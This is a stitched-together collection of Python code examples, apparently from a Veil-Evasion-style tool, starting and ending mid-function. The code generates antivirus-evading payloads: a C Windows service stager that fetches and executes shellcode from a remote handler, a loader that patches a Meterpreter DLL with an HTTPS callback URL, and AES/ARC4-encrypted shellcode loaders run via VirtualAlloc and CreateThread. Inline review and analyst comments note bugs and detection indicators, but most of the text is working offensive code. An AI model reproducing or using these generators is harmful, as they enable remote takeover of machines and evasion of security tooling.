            PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
            PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
            PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
                "string_escape") + '\'\n'
            # plain str here (no bytearray), since create_string_buffer takes a str
            PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
            # no memory-protection call is emitted; presumably relies on the buffer
            # being executable — confirm
            PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
            PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
            PayloadCode += RandShellcode + '()'

            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = crypters.pyherion(PayloadCode)

            return PayloadCode
Example #23
    def generate(self):
        """Return C source for a Windows service stager, as one string.

        The emitted program registers a service, connects to
        ``self.required_options["LHOST"]``/``["LPORT"]``, reads a 4-byte length,
        VirtualAllocs an executable buffer of that size, receives the rest of
        the stream into it and calls it.  Real code is interleaved with shuffled
        "logical nop" string functions, fake ``#include`` lines and randomised
        identifiers, so the output differs on every call.  Nothing is written
        to disk here.  Python 2 only (``xrange``; ``/`` on ints when indexing
        ``randString1``).

        NOTE(review): several of the obfuscation fragments are themselves
        unsound C — sizes drawn from ``random`` can be smaller than the literals
        copied into them, and the character-doubling helper writes one byte
        past its allocation; see the inline notes.
        """

        winsock_init_name = randomizer.randomString()
        punt_name = randomizer.randomString()
        recv_all_name = randomizer.randomString()
        wsconnect_name = randomizer.randomString()

        # the real includes needed
        includes = [
            "#include <stdio.h>", "#include <stdlib.h>",
            "#include <windows.h>", "#include <string.h>"
        ]

        # max length string for obfuscation
        # max_string_length may be as small as 1; the fragments below size stack
        # buffers with it and then copy 50-character literals into them
        global_max_string_length = 10000
        max_string_length = random.randint(1, global_max_string_length)
        max_num_strings = 10000

        # TODO: add in more string processing functions
        randName1 = randomizer.randomString()  # reverse()
        randName2 = randomizer.randomString()  # doubles characters
        stringModFunctions = [
            (randName1,
             "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }"
             % (randName1)),
            # NOTE(review): result has strlen*2+1 bytes but the loop's last iteration
            # writes result[i+1] and the final NUL lands at index strlen*2+1 — both one
            # past the end of the allocation
            (randName2,
             "char* %s(char* s){ char *result =  malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\\0'; return result; }"
             % (randName2))
        ]

        random.shuffle(stringModFunctions)

        # obsufcation - "logical nop" string generation functions
        randString1 = randomizer.randomString(50)
        randName1 = randomizer.randomString()
        randVar1 = randomizer.randomString()
        randName2 = randomizer.randomString()
        randVar2 = randomizer.randomString()
        randVar3 = randomizer.randomString()
        randName3 = randomizer.randomString()
        randVar4 = randomizer.randomString()
        randVar5 = randomizer.randomString()
        stringGenFunctions = [
            (randName1,
             "char* %s(){ char *%s = %s(\"%s\"); return strstr( %s, \"%s\" );}"
             # len(...) / 2 is Python 2 integer division; a float index raises under Python 3
             % (randName1, randVar1, stringModFunctions[0][0], randString1,
                randVar1, randString1[len(randString1) / 2])),
            # NOTE(review): two char[max_string_length/2] stack buffers each receive a
            # 50-char literal and are then strcat'ed together, so the generated code
            # overflows its own stack whenever max_string_length/2 < 101
            (randName2,
             "char* %s(){ char %s[%s/2], %s[%s/2]; strcpy(%s,\"%s\"); strcpy(%s,\"%s\"); return %s(strcat( %s, %s)); }"
             % (randName2, randVar2, max_string_length, randVar3,
                max_string_length, randVar2, randomizer.randomString(50),
                randVar3, randomizer.randomString(50),
                stringModFunctions[1][0], randVar2, randVar3)),
            # NOTE(review): char[max_string_length] initialised from a 50-char literal
            # does not compile when max_string_length < 51
            (randName3,
             "char* %s() { char %s[%s] = \"%s\"; char *%s = strupr(%s); return strlwr(%s); }"
             % (randName3, randVar4, max_string_length,
                randomizer.randomString(50), randVar5, randVar4, randVar5))
        ]
        random.shuffle(stringGenFunctions)

        # obfuscation - add in our fake includes
        fake_includes = [
            "#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>",
            "#include <signal.h>", "#include <stdarg.h>",
            "#include <limits.h>", "#include <assert.h>"
        ]
        # t is assigned but never used; the loop below draws its own bound
        t = random.randint(1, 7)
        # xrange starts at 1, so fake_includes[0] is never chosen and a draw of 1 adds nothing
        for x in xrange(1, random.randint(1, 7)):
            includes.append(fake_includes[x])

        # obsufcation - shuffle up our real and fake includes
        random.shuffle(includes)

        # winsock2.h must precede windows.h, which is why it is emitted before the shuffled list
        code = "#define _WIN32_WINNT 0x0500\n"
        code += "#include <winsock2.h>\n"
        code += "\n".join(includes) + "\n"

        # real - service related headers (check the stub)
        hStatusName = randomizer.randomString()
        serviceHeaders = [
            "SERVICE_STATUS ServiceStatus;",
            "SERVICE_STATUS_HANDLE %s;" % (hStatusName),
            "void  ServiceMain(int argc, char** argv);",
            "void  ControlHandler(DWORD request);"
        ]
        random.shuffle(serviceHeaders)

        code += "\n".join(serviceHeaders)

        # obsufcation - string mod functions
        code += stringModFunctions[0][1] + "\n"
        code += stringModFunctions[1][1] + "\n"

        # real - build the winsock_init function
        wVersionRequested_name = randomizer.randomString()
        wsaData_name = randomizer.randomString()
        code += "void %s() {" % (winsock_init_name)
        # helpers.obfuscateNum(2, 4) is assumed to yield an expression evaluating to 2 — confirm
        code += "WORD %s = MAKEWORD(%s, %s); WSADATA %s;" % (
            wVersionRequested_name, helpers.obfuscateNum(
                2, 4), helpers.obfuscateNum(2, 4), wsaData_name)
        code += "if (WSAStartup(%s, &%s) < 0) { WSACleanup(); exit(1);}}\n" % (
            wVersionRequested_name, wsaData_name)

        # first logical nop string function
        code += stringGenFunctions[0][1] + "\n"

        # real - build punt function (close the socket and terminate the process)
        my_socket_name = randomizer.randomString()
        code += "void %s(SOCKET %s) {" % (punt_name, my_socket_name)
        code += "closesocket(%s);" % (my_socket_name)
        code += "WSACleanup();"
        code += "exit(1);}\n"

        # obsufcation - second logical nop string function
        code += stringGenFunctions[1][1] + "\n"

        # real - build recv_all function
        my_socket_name = randomizer.randomString()
        buffer_name = randomizer.randomString()
        len_name = randomizer.randomString()
        code += "int %s(SOCKET %s, void * %s, int %s){" % (
            recv_all_name, my_socket_name, buffer_name, len_name)
        # the two counters keep fixed (non-randomised) names, unlike the rest of the stub
        code += "int slfkmklsDSA=0;int rcAmwSVM=0;"
        # startb is void*; incrementing it below relies on a compiler extension
        code += "void * startb = %s;" % (buffer_name)
        code += "while (rcAmwSVM < %s) {" % (len_name)
        code += "slfkmklsDSA = recv(%s, (char *)startb, %s - rcAmwSVM, 0);" % (
            my_socket_name, len_name)
        code += "startb += slfkmklsDSA; rcAmwSVM   += slfkmklsDSA;"
        # NOTE(review): only SOCKET_ERROR punts; a recv() of 0 (peer closed) leaves
        # the counter unchanged and the loop never terminates
        code += "if (slfkmklsDSA == SOCKET_ERROR) %s(%s);} return rcAmwSVM; }\n" % (
            punt_name, my_socket_name)

        # obsufcation - third logical nop string function
        code += stringGenFunctions[2][1] + "\n"

        # real - build wsconnect function
        target_name = randomizer.randomString()
        sock_name = randomizer.randomString()
        my_socket_name = randomizer.randomString()
        code += "SOCKET %s() { struct hostent * %s; struct sockaddr_in %s; SOCKET %s;" % (
            wsconnect_name, target_name, sock_name, my_socket_name)
        code += "%s = socket(AF_INET, SOCK_STREAM, 0);" % (my_socket_name)
        code += "if (%s == INVALID_SOCKET) %s(%s);" % (
            my_socket_name, punt_name, my_socket_name)
        # LHOST is spliced into a C string literal unvalidated; a value containing
        # a quote or backslash breaks the generated source
        code += "%s = gethostbyname(\"%s\");" % (
            target_name, self.required_options["LHOST"][0])
        code += "if (%s == NULL) %s(%s);" % (target_name, punt_name,
                                             my_socket_name)
        code += "memcpy(&%s.sin_addr.s_addr, %s->h_addr, %s->h_length);" % (
            sock_name, target_name, target_name)
        code += "%s.sin_family = AF_INET;" % (sock_name)
        # int() on LPORT raises ValueError for a non-numeric option value
        code += "%s.sin_port = htons(%s);" % (
            sock_name,
            helpers.obfuscateNum(int(self.required_options["LPORT"][0]), 32))
        code += "if ( connect(%s, (struct sockaddr *)&%s, sizeof(%s)) ) %s(%s);" % (
            my_socket_name, sock_name, sock_name, punt_name, my_socket_name)
        code += "return %s;}\n" % (my_socket_name)

        # real - main() method for the service code
        serviceName = randomizer.randomString()
        code += "void main() { SERVICE_TABLE_ENTRY ServiceTable[2];"
        serviceTableEntries = [
            "ServiceTable[0].lpServiceName = \"%s\";" % (serviceName),
            "ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;",
            "ServiceTable[1].lpServiceName = NULL;",
            "ServiceTable[1].lpServiceProc = NULL;"
        ]
        random.shuffle(serviceTableEntries)
        code += "\n".join(serviceTableEntries)
        code += "StartServiceCtrlDispatcher(ServiceTable);}\n"

        # real - service status options for us to shuffle
        serviceStatusOptions = [
            "ServiceStatus.dwWin32ExitCode = 0;",
            "ServiceStatus.dwCurrentState = SERVICE_START_PENDING;",
            "ServiceStatus.dwWaitHint = 0;",
            "ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;",
            "ServiceStatus.dwServiceSpecificExitCode = 0;",
            "ServiceStatus.dwCheckPoint = 0;",
            "ServiceStatus.dwServiceType = SERVICE_WIN32;"
        ]
        random.shuffle(serviceStatusOptions)

        # real - serviceMain() code
        code += "void ServiceMain(int argc, char** argv) {\n"
        code += "\n".join(serviceStatusOptions)

        code += "%s = RegisterServiceCtrlHandler( \"%s\", (LPHANDLER_FUNCTION)ControlHandler);" % (
            hStatusName, serviceName)
        code += "if (%s == (SERVICE_STATUS_HANDLE)0) return;" % (hStatusName)
        code += "ServiceStatus.dwCurrentState = SERVICE_RUNNING;"
        code += "SetServiceStatus (%s, &ServiceStatus);" % (hStatusName)

        # everything up to the matching "} return; }" runs once per loop iteration,
        # including the allocations below, none of which are ever freed
        code += "while (ServiceStatus.dwCurrentState == SERVICE_RUNNING) {\n"

        # obsufcation - random variable names
        size_name = randomizer.randomString()
        buffer_name = randomizer.randomString()
        function_name = randomizer.randomString()
        my_socket_name = randomizer.randomString()
        count_name = randomizer.randomString()

        # obsufcation - necessary declarations
        # up to max_num_strings (10000) pointers per array, each malloc'd with up to
        # 10000 bytes below — potentially tens of MB of filler per array
        char_array_name_1 = randomizer.randomString()
        number_of_strings_1 = random.randint(1, max_num_strings)
        char_array_name_2 = randomizer.randomString()
        number_of_strings_2 = random.randint(1, max_num_strings)
        char_array_name_3 = randomizer.randomString()
        number_of_strings_3 = random.randint(1, max_num_strings)

        # real - necessary declarations
        code += "ULONG32 %s;" % (size_name)
        code += "char * %s;" % (buffer_name)
        code += "int i;"
        code += "char* %s[%s];" % (char_array_name_1, number_of_strings_1)
        code += "void (*%s)();" % (function_name)

        # obsufcation - malloc our first string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" % (
            number_of_strings_1, char_array_name_1,
            random.randint(max_string_length, global_max_string_length))

        code += "%s();" % (winsock_init_name)
        code += "char* %s[%s];" % (char_array_name_2, number_of_strings_2)
        code += "SOCKET %s = %s();" % (my_socket_name, wsconnect_name)

        # obsufcation - malloc our second string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" % (
            number_of_strings_2, char_array_name_2,
            random.randint(max_string_length, global_max_string_length))

        # real - receive the 4 byte size from the handler
        code += "int %s = recv(%s, (char *)&%s, %s, 0);" % (
            count_name, my_socket_name, size_name, helpers.obfuscateNum(4, 2))
        # real - punt the socket if something goes wrong
        # size_name is ULONG32, so "<= 0" only rejects zero; the value is otherwise
        # trusted as received and is used unchecked as an allocation size below
        code += "if (%s != %s || %s <= 0) %s(%s);" % (
            count_name, helpers.obfuscateNum(
                4, 2), size_name, punt_name, my_socket_name)

        # real - virtual alloc space for the meterpreter .dll
        # "+ 5" leaves room for the 5-byte prefix written before the received data
        code += "%s = VirtualAlloc(0, %s + %s, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" % (
            buffer_name, size_name, helpers.obfuscateNum(5, 2))

        # obsufcation - declare space for our 3 string obfuscation array
        code += "char* %s[%s];" % (char_array_name_3, number_of_strings_3)

        # obsufcation - first string obfuscation method
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" % (
            number_of_strings_1, char_array_name_1, stringGenFunctions[0][0])

        # real - check if the buffer received is null, if so punt the socket
        code += "if (%s == NULL) %s(%s);" % (buffer_name, punt_name,
                                             my_socket_name)

        # real - prepend some buffer magic to push the socket number onto the stack
        code += "%s[0] = 0xBF;" % (buffer_name)
        # real-  copy the 4 magic bytes into the buffer
        code += "memcpy(%s + 1, &%s, %s);" % (buffer_name, my_socket_name,
                                              helpers.obfuscateNum(4, 2))

        # obsufcation - malloc our third string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" % (
            number_of_strings_3, char_array_name_3,
            random.randint(max_string_length, global_max_string_length))

        # obsufcation - second string obfuscation method
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" % (
            number_of_strings_2, char_array_name_2, stringGenFunctions[1][0])

        # real - receive all data from the socket
        code += "%s = %s(%s, %s + %s, %s);" % (
            count_name, recv_all_name, my_socket_name, buffer_name,
            helpers.obfuscateNum(5, 2), size_name)
        code += "%s = (void (*)())%s;" % (function_name, buffer_name)
        code += "%s();" % (function_name)

        # obsufcation - third string obfuscation method (never called)
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" % (
            number_of_strings_3, char_array_name_3, stringGenFunctions[2][0])

        code += "} return; }\n"

        # service control handler code
        # stop and shutdown both report SERVICE_STOPPED; anything else re-reports the current status
        code += """void ControlHandler(DWORD request) 
    { 
        switch(request) 
        { 
            case SERVICE_CONTROL_STOP: 
                ServiceStatus.dwWin32ExitCode = 0; 
                ServiceStatus.dwCurrentState  = SERVICE_STOPPED; 
                SetServiceStatus (%s, &ServiceStatus);
                return; 
            case SERVICE_CONTROL_SHUTDOWN: 
                ServiceStatus.dwWin32ExitCode = 0; 
                ServiceStatus.dwCurrentState  = SERVICE_STOPPED; 
                SetServiceStatus (%s, &ServiceStatus);
                return; 
            default:
                break;
        } 
        SetServiceStatus (%s,  &ServiceStatus);
        return; 
    } 
    """ % (hStatusName, hStatusName, hStatusName)

        return code
Example #24
    def generate(self):
        """Build a Python 2 source string that loads a patched 32-bit metsrv DLL in memory.

        The DLL is read from ``settings.METASPLOIT_PATH`` (``metsrv.x86.dll`` if
        present, else ``metsrv.dll``) and patched in place with: a fixed 48-byte
        header stub, a fixed User-Agent, the HTTPS transport marker, the handler
        URL built from ``self.required_options["LHOST"]`` / ``["LPORT"]``, and two
        timeout values.  The result is passed through ``helpers.deflate`` and
        embedded as a string literal in the emitted script.  ``inject_method``
        selects how the emitted script runs the blob ("void": cast the string to
        a function pointer; anything else: VirtualAlloc/RtlMoveMemory/CreateThread),
        and ``use_pyherion == "y"`` wraps the result with ``crypters.pyherion``.

        Returns:
            str: the generated loader source.  The code treats ``str`` as bytes
            (``open(..., "rb")`` + ``str.index`` with text markers), so it is
            Python 2 only.

        Raises:
            IOError: if the DLL cannot be opened.
            ValueError: from ``str.index`` if a patch marker is not present.

        Analyst note: the patched values are constant across builds -- the
        User-Agent below and the ``https://<host>:<port>/<checksum>_<16 chars>/``
        URI shape are the natural network indicators for this loader, and the
        emitted script's RWX-allocate-then-CreateThread sequence is the usual
        host-side detection point.
        """

        # prefer the x86-suffixed metsrv build, fall back to the unsuffixed name
        if os.path.exists(settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"):
            metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"
        else:
            metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"

        # read the whole DLL as raw bytes (a Python 2 str)
        f = open(metsrvPath, "rb")
        meterpreterDll = f.read()
        f.close()

        # splice s over dll at offset ind; the overall length is unchanged as long
        # as ind + len(s) does not run past the end of dll
        dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s) :]

        # overwrite the first 48 bytes of the DLL header with a fixed stub (the
        # 'MZ' magic 0x4d 0x5a is kept); the stub is byte-identical in every build
        headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\xb0"
        headerPatch += "\x0e\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
        headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
        meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch)

        # patch in the User-Agent; it is the same constant for every build and is
        # therefore a stable network indicator for traffic produced by this DLL
        userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
        userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
        meterpreterDll = dllReplace(meterpreterDll, userAgentIndex, userAgentString)

        # select the HTTPS transport by overwriting the SSL marker (the original
        # comment said "turn off SSL"); the replacement is 3 bytes longer than the
        # 25-byte marker, so it presumably relies on padding after the marker
        sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
        sslString = "METERPRETER_TRANSPORT_HTTPS\x00"
        meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString)

        # replace the 264-byte URL placeholder ("https://" + 256 'X') with the
        # handler URL; the shorter replacement is NUL-terminated and the leftover
        # placeholder bytes stay behind the NUL.  Shape of the result:
        #   https://<LHOST>:<LPORT>/<checksum>_<16 random chars>/
        urlIndex = meterpreterDll.index("https://" + ("X" * 256))
        urlString = (
            "https://"
            + self.required_options["LHOST"][0]
            + ":"
            + str(self.required_options["LPORT"][0])
            + "/"
            + self.genHTTPChecksum()
            + "_"
            + randomizer.randomString(16)
            + "/\x00"
        )
        meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString)

        # session expiration timeout: the 4-byte little-endian marker 0xB64BE661
        # is replaced with 604800 seconds (7 days) -- not 300 as the original
        # comment claimed
        expirationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xB64BE661))
        expirationTimeout = struct.pack("<I", 604800)
        meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex, expirationTimeout)

        # communication timeout: marker 0xAF79257F is replaced with 300 seconds
        communicationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xAF79257F))
        communicationTimeout = struct.pack("<I", 300)
        meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex, communicationTimeout)

        # compress and encode the DLL; the emitted script reverses this with
        # base64.b64decode + zlib.decompress(..., -15), so helpers.deflate is
        # expected to yield base64 text of a raw (header-less) DEFLATE stream
        compressedDll = helpers.deflate(meterpreterDll)

        # actually build out the payload
        payloadCode = ""

        # variant 1: execute straight out of the Python string object by casting
        # its buffer to a function pointer
        if self.required_options["inject_method"][0].lower() == "void":

            # doing void * cast
            payloadCode += "from ctypes import *\nimport base64,zlib\n"

            randInflateFuncName = randomizer.randomString()
            randb64stringName = randomizer.randomString()
            randVarName = randomizer.randomString()

            # emitted inflate helper: base64 decode, then raw DEFLATE (wbits -15)
            payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
            payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"

            randVarName = randomizer.randomString()
            randFuncName = randomizer.randomString()

            # inflate into a str, cast it to CFUNCTYPE(c_void_p) and call it
            payloadCode += randVarName + " = " + randInflateFuncName + '("' + compressedDll + '")\n'
            payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
            payloadCode += randFuncName + "()\n"

        # variant 2: VirtualAlloc(NULL, len, 0x3000 = MEM_COMMIT|MEM_RESERVE,
        # 0x40 = PAGE_EXECUTE_READWRITE), copy with RtlMoveMemory, run on a new
        # thread and block forever (-1 = INFINITE).  A RWX allocation followed by
        # CreateThread on that region is a well-known memory-scanner/EDR signal.
        else:

            payloadCode += "import ctypes,base64,zlib\n"

            randInflateFuncName = randomizer.randomString()
            randb64stringName = randomizer.randomString()
            randVarName = randomizer.randomString()
            randPtr = randomizer.randomString()
            randBuf = randomizer.randomString()
            randHt = randomizer.randomString()

            # emitted inflate helper: base64 decode, then raw DEFLATE (wbits -15)
            payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
            payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"

            payloadCode += randVarName + " = bytearray(" + randInflateFuncName + '("' + compressedDll + '"))\n'
            payloadCode += (
                randPtr
                + " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len("
                + randVarName
                + ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n"
            )
            payloadCode += randBuf + " = (ctypes.c_char * len(" + randVarName + ")).from_buffer(" + randVarName + ")\n"
            payloadCode += (
                "ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int("
                + randPtr
                + "),"
                + randBuf
                + ",ctypes.c_int(len("
                + randVarName
                + ")))\n"
            )
            payloadCode += (
                randHt
                + " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int("
                + randPtr
                + "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n"
            )
            payloadCode += "ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + randHt + "),ctypes.c_int(-1))\n"

        # optional outer wrapping of the whole script by the pyherion crypter
        if self.required_options["use_pyherion"][0].lower() == "y":
            payloadCode = crypters.pyherion(payloadCode)

        return payloadCode
def pyAESVAlloc():
    """Write ``payload.py``, a Python 2 script that AES-decrypts and runs msfvenom shellcode.

    The shellcode returned by ``shellcode.genShellcode()`` is padded to a
    32-byte boundary with '{', encrypted with a key from ``aes.aesKey()`` and
    base64-encoded.  The emitted script embeds the ciphertext *and the key*
    as string literals, decrypts at runtime, and executes the result via the
    VirtualAlloc / RtlMoveMemory / CreateThread / WaitForSingleObject sequence.
    ``payload.py`` in the current working directory is overwritten without
    any check.  Afterwards ``supportfiles.supportingFiles()`` and
    ``messages.endmsg()`` are called.

    Returns:
        None.

    Analyst note: since the key is written next to the ciphertext, the
    encryption is only an obfuscation layer -- the shellcode is recoverable
    statically from the generated file.  The emitted script imports
    ``Crypto.Cipher.AES``, so it needs PyCrypto on the machine that runs it.
    """
    # Generate Shellcode Using msfvenom
    Shellcode = shellcode.genShellcode()

    # Generate Random Variable Names
    ShellcodeVariableName = randomizer.randomString()
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()
    RandDecodeAES = randomizer.randomString()
    RandCipherObject = randomizer.randomString()
    RandDecodedShellcode = randomizer.randomString()
    RandShellCode = randomizer.randomString()
    RandPadding = randomizer.randomString()

    # 32-byte block padding with a literal '{'; the emitted script strips
    # trailing '{' with rstrip after decrypting
    BlockSize = 32
    Padding = '{'

    # pad s up to the next multiple of BlockSize (always adds at least one char)
    pad = lambda s: s + (BlockSize - len(s) % BlockSize) * Padding

    # EncodeAES: encrypt padded text and base64 it.  DecodeAES is the inverse
    # but is never called in this function (only emitted, in the script below).
    EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
    DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(Padding)

    # Generate Random AES Key
    secret = aes.aesKey()

    # NOTE(review): no mode argument -- PyCrypto's AES.new defaults to ECB, so
    # equal plaintext blocks produce equal ciphertext blocks; confirm against
    # the installed library
    cipher = AES.new(secret)

    # Encrypt the String
    EncodedShellcode = EncodeAES(cipher, Shellcode)

    # Create Payload File (hard-coded relative path, truncated if it exists)
    PayloadFile = open('payload.py', 'w')
    PayloadFile.write('#!/usr/bin/python\n\n')
    PayloadFile.write('import ctypes\n')
    PayloadFile.write('from Crypto.Cipher import AES\n')
    PayloadFile.write('import base64\n')
    PayloadFile.write('import os\n\n')
    PayloadFile.write(RandPadding + ' = \'{\'\n')
    PayloadFile.write(
        RandDecodeAES +
        ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' +
        RandPadding + ')\n')
    # the AES key is written into the script in clear text
    PayloadFile.write(RandCipherObject + ' = AES.new(\'' + secret + '\')\n')
    PayloadFile.write(RandDecodedShellcode + ' = ' + RandDecodeAES + '(' +
                      RandCipherObject + ', \'' + EncodedShellcode + '\')\n')
    # "string_escape" is a Python 2-only codec
    PayloadFile.write(RandShellCode + ' = bytearray(' + RandDecodedShellcode +
                      '.decode("string_escape"))\n\n')
    # VirtualAlloc(NULL, len, 0x3000 = MEM_COMMIT|MEM_RESERVE,
    # 0x40 = PAGE_EXECUTE_READWRITE)
    PayloadFile.write(
        RandPtr +
        ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('
        + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n')
    PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + RandShellCode +
                      ')).from_buffer(' + RandShellCode + ')\n\n')
    PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' +
                      RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' +
                      RandShellCode + ')))\n\n')
    # new thread on the RWX buffer; the classic pattern memory scanners flag
    PayloadFile.write(
        RandHt +
        ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int('
        + RandPtr +
        '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n'
    )
    # -1 == INFINITE: the script blocks until the thread ends
    PayloadFile.write(
        'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt +
        '),ctypes.c_int(-1))')
    PayloadFile.close()

    # Create Supporting Files and Print Exit Message
    supportfiles.supportingFiles()
    messages.endmsg()
	def generate(self):
		"""Return a Python 2 source string that ARC4-decrypts and runs msfvenom shellcode.

		``inject_method == "virtual"`` emits the VirtualAlloc / RtlMoveMemory /
		CreateThread / WaitForSingleObject loader; any other value emits a
		``create_string_buffer`` + ``cast(..., CFUNCTYPE(c_void_p))`` loader.
		Both branches are otherwise the same: an 8-byte ARC4 key comes from
		``randomizer.randomKey(8)``, the shellcode from ``self.shellcode.generate()``
		is encrypted, and key and ciphertext are written into the script as
		string literals.  When ``use_pyherion`` is "y" the script is wrapped by
		``crypters.pyherion``.

		Returns:
			str: the generated loader source (uses the Python 2-only
			"string_escape" codec).

		Analyst note: the ARC4 key sits in clear text next to the ciphertext,
		so the shellcode is recoverable from the script without running it.
		The ``iv`` value is generated and emitted but never used -- ARC4 is a
		stream cipher and takes no IV.
		"""
		if self.required_options["inject_method"][0].lower() == "virtual":
		
			# Generate Shellcode Using msfvenom
			Shellcode = self.shellcode.generate()
		
			# Generate Random Variable Names
			RandPtr = randomizer.randomString()
			RandBuf = randomizer.randomString()
			RandHt = randomizer.randomString()
			ShellcodeVariableName = randomizer.randomString()
			RandIV = randomizer.randomString()
			RandARCKey = randomizer.randomString()
			RandARCPayload = randomizer.randomString()
			RandEncShellCodePayload = randomizer.randomString()
				
			# 8-byte IV (unused by ARC4) and 8-byte ARC4 key
			iv = randomizer.randomKey(8)
			ARCKey = randomizer.randomKey(8)

			# ARC4 stream cipher (the original comment said DES); encrypt the shellcode
			arc4main = ARC4.new(ARCKey)
			EncShellCode = arc4main.encrypt(Shellcode)
		
			# emitted script: key and ciphertext as literals, decrypt, then
			# VirtualAlloc(0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE),
			# RtlMoveMemory, CreateThread, WaitForSingleObject(-1 = INFINITE)
			PayloadCode = 'from Crypto.Cipher import ARC4\n'
			PayloadCode += 'import ctypes\n'
			PayloadCode += RandIV + ' = \'' + iv + '\'\n'
			PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
			PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
			PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
			PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
			PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
			PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
			PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
			PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
			PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
		
			# optional outer wrapping by the pyherion crypter
